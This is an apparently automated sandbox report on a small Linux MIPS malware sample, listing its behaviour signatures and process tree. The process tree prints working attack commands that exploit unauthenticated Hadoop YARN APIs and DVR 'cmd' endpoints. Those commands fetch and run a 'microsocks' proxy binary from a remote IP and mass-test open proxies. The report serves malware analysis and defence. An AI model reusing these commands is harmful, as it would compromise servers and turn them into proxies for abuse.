Analysis

  • max time kernel
    13s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20260513-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20260513-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    22/08/2026, 14:06

General

  • Target
    c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • Size 3KB
  • Sample260822-rertkavfjg
  • SHA256 c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • MD5 SHA1 SHA512 TLSH

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to shm directory 9 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    1⤵
    • Writes file to shm directory
    • Writes file to tmp directory
    PID:716
    • /usr/bin/pgrep
      pgrep -f "masscan.*targeted"
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:720
    • /bin/date
      date "+%H:%M:%S"
      2⤵
        PID:728
      • /bin/sleep
        sleep 5
        2⤵
          PID:730
        • /bin/grep
          grep -v "^#" /dev/shm/.sys/raw.txt
          2⤵
            PID:765
          • /usr/bin/awk
            awk "{print \$4\":\"\$3}"
            2⤵
            • Reads runtime system information
            PID:766
          • /bin/date
            date "+%H:%M:%S"
            2⤵
              PID:769
            • /bin/grep
              grep ":8088\$" /dev/shm/.sys/ips.txt
              2⤵
              • System Network Configuration Discovery
              PID:773
            • /usr/bin/cut
              cut -d: -f1
              2⤵
                PID:774
              • /usr/bin/cut
                cut -d: -f1
                2⤵
                  PID:777
                • /bin/grep
                  grep ":8080\$" /dev/shm/.sys/ips.txt
                  2⤵
                  • System Network Configuration Discovery
                  PID:776
                • /usr/bin/cut
                  cut -d: -f1
                  2⤵
                    PID:781
                  • /bin/grep
                    grep ":80\$" /dev/shm/.sys/ips.txt
                    2⤵
                    • System Network Configuration Discovery
                    PID:780
                  • /usr/bin/cut
                    cut -d: -f1
                    2⤵
                      PID:785
                    • /bin/grep
                      grep ":23\$" /dev/shm/.sys/ips.txt
                      2⤵
                      • System Network Configuration Discovery
                      PID:784
                    • /bin/date
                      date "+%H:%M:%S"
                      2⤵
                        PID:805
                      • /bin/cat
                        cat /dev/shm/.sys/pproxy.txt
                        2⤵
                          PID:810
                        • /usr/bin/xargs
                          xargs -P 500 "-I{}" sh -c "code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{} http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo {}"
                          2⤵
                          • System Network Configuration Discovery
                          PID:811
                        • /bin/cat
                          cat /dev/shm/.sys/p8080.txt /dev/shm/.sys/p80.txt
                          2⤵
                            PID:814
                          • /usr/bin/xargs
                            xargs -P 500 "-I{}" sh -c "for p in 80 8080; do code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{}:\$p http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo \"{}:\$p\" && break; done"
                            2⤵
                            • System Network Configuration Discovery
                            PID:816
                          • /usr/bin/sort
                            sort -u
                            2⤵
                              PID:815
                            • /usr/bin/sort
                              sort -u /dev/shm/.sys/verified_http.txt -o /dev/shm/.sys/verified_http.txt
                              2⤵
                                PID:819
                              • /bin/date
                                date "+%H:%M:%S"
                                2⤵
                                  PID:825
                                • /bin/cat
                                  cat /dev/shm/.sys/p8088.txt
                                  2⤵
                                    PID:827
                                  • /usr/bin/xargs
                                    xargs -P 100 "-I{}" sh -c " resp=\$(curl -s -m 5 \"http://{}:8088/ws/v1/cluster/info\" 2>/dev/null) echo \"\$resp\" | grep -q clusterInfo && { app=\$(curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps/new-application\" 2>/dev/null) appid=\$(echo \"\$app\" | python3 -c \"import json,sys;print(json.load(sys.stdin).get(\\\"application-id\\\",\\\"\\\"))\" 2>/dev/null) [ -n \"\$appid\" ] && { cmd=\"wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps\" -H \"Content-Type: application/json\" -d \"{\\\"application-id\\\":\\\"\$appid\\\",\\\"application-name\\\":\\\"svc\\\",\\\"am-container-spec\\\":{\\\"commands\\\":{\\\"command\\\":\\\"\$cmd\\\"}},\\\"application-type\\\":\\\"YARN\\\"}\" 2>/dev/null sleep 5 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" >> /dev/shm/.sys/yarn_exploited.txt } } "
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:828
                                  • /bin/date
                                    date "+%H:%M:%S"
                                    2⤵
                                      PID:832
                                    • /usr/bin/sort
                                      sort -u
                                      2⤵
                                        PID:834
                                      • /bin/cat
                                        cat /dev/shm/.sys/p80.txt /dev/shm/.sys/p8080.txt
                                        2⤵
                                          PID:833
                                        • /usr/bin/xargs
                                          xargs -P 200 "-I{}" sh -c " for path in /dvr/cmd /cn/cmd; do resp=\$(curl -s -m 3 \"http://{}\$path\" 2>/dev/null) if [ -n \"\$resp\" ]; then curl -s -m 3 -X POST \"http://{}\$path\" -d \"cmd=wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" 2>/dev/null sleep 3 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" && break fi done "
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:835
                                        • /bin/date
                                          date "+%H:%M:%S"
                                          2⤵
                                            PID:840
                                          • /bin/cat
                                            cat /dev/shm/.sys/verified_http.txt /dev/shm/.sys/yarn_exploited.txt /dev/shm/.sys/dvr_exploited.txt /tmp/global.txt
                                            2⤵
                                              PID:841
                                            • /usr/bin/sort
                                              sort -u
                                              2⤵
                                                PID:842
                                              • /bin/mv
                                                mv /tmp/global_new.txt /tmp/global.txt
                                                2⤵
                                                  PID:843
                                                • /bin/sed
                                                  sed -i "s#^.*://##" /tmp/global.txt
                                                  2⤵
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:844
                                                • /bin/date
                                                  date "+%H:%M:%S"
                                                  2⤵
                                                    PID:845
                                                  • /usr/bin/wc
                                                    wc -l
                                                    2⤵
                                                      PID:853
                                                    • /bin/date
                                                      date "+%H:%M:%S"
                                                      2⤵
                                                        PID:854

                                                    Network

                                                          MITRE ATT&CK Enterprise v16

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads